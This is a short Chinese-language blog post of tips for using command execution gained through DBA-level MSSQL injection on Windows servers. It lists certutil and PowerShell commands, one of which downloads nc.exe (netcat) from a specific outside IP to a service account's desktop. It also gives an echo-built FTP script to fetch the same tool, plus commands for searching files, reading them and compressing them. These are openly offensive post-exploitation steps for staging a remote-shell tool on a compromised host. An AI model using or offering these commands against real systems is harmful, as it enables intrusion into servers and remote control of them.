MSSQL的DBA注入的一些小操作

搞了一晚上的mssql的dba注入,虽然没搞下来,但是收获颇深,总结一下小技巧

查看当前目录

echo %CD%  #C:/Windows/system32

常用的下载文件方法

certutil

certutil -urlcache -split -f https://www.baidu.com/img/bd_logo1.png D:\x.txt 自定义目录下载

powershell

1
powershell (new-object System.Net.WebClient).DownloadFile( 'http://47.95.206.199/NC.EXE','c:\Users\mssql$centersoft\desktop\nc.exe')

ftp

1
2
3
4
5
6
echo open 127.0.0.1 21> c:\Users\mssql$centersoft\desktop\ftp1.txt
echo xadmintony>> c:\Users\mssql$centersoft\desktop\ftp1.txt
echo y123456>> c:\Users\mssql$centersoft\desktop\ftp1.txt
echo lcd c:\Users\mssql$centersoft\desktop\>>c:\Users\mssql$centersoft\desktop\ftp1.txt
echo GET nc.exe>>c:\Users\mssql$centersoft\desktop\ftp1.txt
echo bye>>c:\Users\mssql$centersoft\desktop\ftp1.txt

其他方法移步:

https://www.t00ls.net/articles-37253.html 不写那么多了,其他的有点鸡肋

查看文件内容

more c:\a.txt

查找文件

1
2
3
4
dir \s \b xxx #在执行cmd的盘符查找(好像可以从内容中找)
dir c:\ \s \b xxx #在c盘查找
dir c:\ #显示c盘的内容
dir \s\b c:xxx.aspx #查找文件

win自带的压缩解压命令

1
2
3
4
5
压缩一个文件: 
makecab c:/file_name.txt c:/file_name.zip

解压一个文件:
expand c:/file_name.zip c:/file_name.txt

ps:必须用makcab压缩的才能用expand解压